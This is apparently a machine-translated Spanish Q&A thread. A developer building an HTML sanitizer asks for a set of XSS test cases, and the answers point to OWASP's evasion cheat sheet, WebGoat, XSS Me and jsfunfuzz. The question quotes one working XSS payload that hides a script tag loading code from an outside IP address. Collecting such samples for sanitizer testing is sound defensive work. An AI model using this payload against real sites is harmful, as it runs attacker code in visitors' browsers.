Prueba de tortura XSS - ¿existe?

Question

Estoy buscando escribir un desinfectante html, y obviamente, para probar / probar que funciona correctamente, necesito un conjunto de ejemplos XSS para lanzar contra él para ver cómo funciona. Aquí hay un buen ejemplo de Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Sé que hay un Mime Torture Test que comprende varios anidados correos electrónicos con archivos adjuntos que se utilizan para probar los decodificadores Mime (si pueden decodificarlos correctamente, se ha comprobado que funcionan). Básicamente estoy buscando un equivalente para XSS, es decir, una lista de ejemplos de html poco fiables que puedo lanzar a mi desinfectante para asegurarme de que funcione bien.

Si alguien también tiene buenos recursos sobre cómo escribir el desinfectante (es decir, qué explotaciones comunes intentan usar las personas, etc.) también se les agradecería recibirlos.

Gracias de antemano :-)

Edit: Lo siento si esto no estaba claro antes, pero estaba después de un conjunto de pruebas de tortura para poder escribir pruebas unitarias para el desinfectante, no probarlas en el navegador, etc. Los datos de origen en teoría pueden haber llegado desde cualquier lugar, no solo un navegador.

Answer 1

Eche un vistazo a esta Lista de trucos de XSS: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me es un excelente complemento de Firefox con el que puedes correr su desinfectante.

Answer 3

Consulte OWASP . Tienen una buena guía sobre cómo funciona XSS, qué buscar e incluso el WebGoat proyecto, donde puedes probar tu mano en un sitio vulnerable.

Answer 4

Puede probar el jsfunfuzz de Jesse Ruderman ( http: //www.squarefree .com / 2007/08/02 / introducing-jsfunfuzz / ) que arroja datos aleatorios a su Javascript intentando romperlos. Parece que el equipo de Firefox lo ha utilizado con gran éxito.